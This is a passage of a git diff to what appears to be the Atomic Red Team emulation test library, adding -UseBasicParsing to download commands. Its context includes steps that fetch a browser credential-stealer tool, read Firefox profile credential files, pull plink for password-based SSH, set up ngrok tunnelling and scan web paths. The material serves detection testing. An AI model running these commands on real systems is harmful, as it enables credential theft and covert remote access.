"https://download.mozilla.org/?product=firefox-stub&os=win&lang=en-US" + Invoke-WebRequest -OutFile $installer "https://download.mozilla.org/?product=firefox-stub&os=win&lang=en-US" -UseBasicParsing Start-Process -FilePath $installer -Wait Stop-Process -Name "firefox" - description: | @@ -441,14 +441,14 @@ atomic_tests: if (Test-Path "PathToAtomicsFolder\T1555.003\bin\BrowserCollector.exe") {exit 0} else {exit 1} get_prereq_command: |- New-Item -Type Directory "PathToAtomicsFolder\T1555.003\bin\" -ErrorAction Ignore -Force | Out-Null - Invoke-WebRequest "https://github.com/SaulBerrenson/BrowserStealer/releases/download/1.0.0.4/BrowserCollector_x64.exe" -Outfile: "PathToAtomicsFolder\T1555.003\bin\BrowserCollector.exe" + Invoke-WebRequest "https://github.com/SaulBerrenson/BrowserStealer/releases/download/1.0.0.4/BrowserCollector_x64.exe" -Outfile: "PathToAtomicsFolder\T1555.003\bin\BrowserCollector.exe" -UseBasicParsing - description: | Login Data file that is a copy of a Firefox Login Data that contains credentials for the tool to "steal." Must exist at the specified path. prereq_command: |- if (Test-Path "PathToAtomicsFolder\T1555.003\src\key4.db") {exit 0} else {exit 1} get_prereq_command: |- - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/src/key4.db?raw=true" -Outfile: "PathToAtomicsFolder\T1555.003\src\key4.db" - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/src/logins.json?raw=true" -Outfile: "PathToAtomicsFolder\T1555.003\src\logins.json" + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/src/key4.db?raw=true" -Outfile: "PathToAtomicsFolder\T1555.003\src\key4.db" -UseBasicParsing + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/src/logins.json?raw=true" -Outfile: "PathToAtomicsFolder\T1555.003\src\logins.json" -UseBasicParsing executor: command: | $profile = (Gci -filter "*default-release*" -path $env:Appdata\Mozilla\Firefox\Profiles\).FullName @@ -488,7 +488,7 @@ atomic_tests: get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null $installer = "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi" - Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi" https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi + Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi" https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi -UseBasicParsing msiexec /i $installer /qn Start-Process -FilePath "chrome.exe" Stop-Process -Name "chrome" diff --git a/atomics/T1560.001/T1560.001.yaml b/atomics/T1560.001/T1560.001.yaml index dbc7893d..5824799f 100644 --- a/atomics/T1560.001/T1560.001.yaml +++ b/atomics/T1560.001/T1560.001.yaml @@ -346,7 +346,7 @@ atomic_tests: if (Test-Path "#{plink_file}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null - Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" + Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" -UseBasicParsing executor: command: | # Extract line with IP address from the syslog configuration output diff --git a/atomics/T1562.010/T1562.010.yaml b/atomics/T1562.010/T1562.010.yaml index 4fd651fa..5e6e24e4 100644 --- a/atomics/T1562.010/T1562.010.yaml +++ b/atomics/T1562.010/T1562.010.yaml @@ -74,7 +74,7 @@ atomic_tests: if (Test-Path "#{plink_file}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null - Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" + Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" -UseBasicParsing executor: command: | echo "" | "#{plink_file}" "#{vm_host}" -ssh -l "#{vm_user}" -pw "#{vm_pass}" -m "#{cli_script}" diff --git a/atomics/T1564.006/T1564.006.yaml b/atomics/T1564.006/T1564.006.yaml index 71057a44..0a60c7b7 100644 --- a/atomics/T1564.006/T1564.006.yaml +++ b/atomics/T1564.006/T1564.006.yaml @@ -25,14 +25,14 @@ atomic_tests: if (Test-Path "#{msi_file_path}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory (split-path "#{msi_file_path}") -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1564.006/bin/Virtualbox_52.msi" -OutFile "#{msi_file_path}" + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1564.006/bin/Virtualbox_52.msi" -OutFile "#{msi_file_path}" -UseBasicParsing - description: | CAB file must exist on disk at specified location (#{cab_file_path}) prereq_command: | if (Test-Path "#{cab_file_path}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory (split-path "#{cab_file_path}") -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1564.006/bin/common.cab" -OutFile "#{cab_file_path}" + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1564.006/bin/common.cab" -OutFile "#{cab_file_path}" -UseBasicParsing - description: | Old version of Virtualbox must be installed prereq_command: | diff --git a/atomics/T1572/T1572.yaml b/atomics/T1572/T1572.yaml index f9dd1e22..1523e5e0 100644 --- a/atomics/T1572/T1572.yaml +++ b/atomics/T1572/T1572.yaml @@ -134,7 +134,7 @@ atomic_tests: if (Test-Path C:\Users\Public\ngrok) {exit 0} else {exit 1} get_prereq_command: | New-Item -Path C:\Users\Public\ngrok -ItemType Directory | Out-Null - Invoke-WebRequest #{download} -OutFile C:\Users\Public\ngrok\ngrok-v3-stable-windows-amd64.zip + Invoke-WebRequest #{download} -OutFile C:\Users\Public\ngrok\ngrok-v3-stable-windows-amd64.zip -UseBasicParsing Expand-Archive C:\Users\Public\ngrok\ngrok-v3-stable-windows-amd64.zip -DestinationPath C:\Users\Public\ngrok executor: command: | diff --git a/atomics/T1595.003/src/WebServerScan.ps1 b/atomics/T1595.003/src/WebServerScan.ps1 index b0e15132..c525135e 100644 --- a/atomics/T1595.003/src/WebServerScan.ps1 +++ b/atomics/T1595.003/src/WebServerScan.ps1 @@ -5,7 +5,7 @@ function Test-Target { ) try { - Invoke-WebRequest -Uri $Target -ErrorAction Stop -TimeoutSec $Timeout -SkipHttpErrorCheck + Invoke-WebRequest -Uri $Target -ErrorAction Stop -TimeoutSec $Timeout -SkipHttpErrorCheck -UseBasicParsing return $true } catch { @@ -31,7 +31,7 @@ function Invoke-WordlistScan { foreach ($Word in $Wordlist) { $Url = $Target + "/" + $Word - $Response = Invoke-WebRequest -Uri "$Url" -Method HEAD -ErrorAction SilentlyContinue -TimeoutSec $Timeout -SkipHttpErrorCheck + $Response = Invoke-WebRequest -Uri "$Url" -Method HEAD -ErrorAction SilentlyContinue -TimeoutSec $Timeout -SkipHttpErrorCheck -UseBasicParsing if ($Response.StatusCode -ge 200 -and $Response.StatusCode -lt 400) { $Results += $Url